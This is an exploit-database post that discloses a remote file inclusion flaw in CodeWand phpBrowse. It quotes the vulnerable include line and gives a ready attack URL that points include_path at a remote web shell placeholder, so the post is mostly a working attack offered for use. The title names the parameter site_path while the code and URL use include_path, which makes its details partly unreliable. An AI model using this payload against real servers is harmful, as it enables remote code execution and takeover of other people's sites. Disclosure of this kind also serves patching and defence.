id: 1709
date: 04/04/2007
title: CodeWand phpBrowse (site_path) Remote File Inclusion Vulnerability
author: kezzap66345
cves: 

==================================================================
CodeWand phpBrowse (site_path) Remote File Inclusion Vulnerability
==================================================================




PhpBrowse
*****************
Found by kezzap66345 *
*****************
ERROR:
/include/include_stream.inc.php


include($include_path . "style.inc.php");     <<< rfi coded


**************************************************************************************
**************************************************************************************
**************************************************************************************
**************************************************************************************
**************************************************************************************
RFI:

http://SITE.com/path/include/include_stream.inc.php?include_path=[SHELL]

**************************************************************************************
**************************************************************************************
**************************************************************************************
**************************************************************************************
**************************************************************************************
kezzap66345[at]hotmail[dot]com

******thanx=x0r0n*shika***Siircicocuk*************************************************



#  0day.today [2023-03-23]  #